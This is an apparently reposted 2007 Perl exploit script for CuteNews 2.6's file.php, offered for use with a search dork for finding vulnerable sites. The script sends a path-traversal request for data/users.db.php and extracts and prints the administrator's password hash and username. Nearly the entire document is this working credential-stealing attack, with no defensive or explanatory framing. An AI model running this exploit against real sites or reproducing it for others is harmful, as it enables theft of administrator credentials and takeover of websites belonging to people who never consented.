CuteNews Arbitrary File Download AllVersion
Do, 30/12/2007 - 00:44 — OeX
!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;
if(@ARGV!=2){
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "USAGE : perl $0 <SITE> <PATH>\n";
exit;
}
($SITE,$PATH)=@ARGV;
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET =>
"$SITE$PATH/file.php?file=../../data/users.db.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
if($res->is_success){
if($con =~ /([0-9a-fA-F]{32})/){
$hash = $1;
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Exploit Work!\n";
print "[+] Admin Pass : ".$hash."\n";
$ua2 = new LWP::UserAgent;
$ua2->agent("Mozilla/8.0");
$ua2 = LWP::UserAgent->new;
my $req2 = HTTP::Request->new(GET =>
"$SITE$PATH/file.php?file=../../data/users.db.php");
$req2->header('Accept' => 'text/html');
$res2 = $ua2->request($req2);
$con2 = $res2->content;
if($con2 =~ /\|.\|(.*)\|$hash\|/){
$user = $1;
print "[+] Admin Username : ".$user."\n";
}
}
else{
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Connect failed..\n";
}
}
else{
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "_____________________________\n";
print "[+] Exploit Failed..\n";
}- 234 lecturas
Comentarios
Enviar un comentario nuevo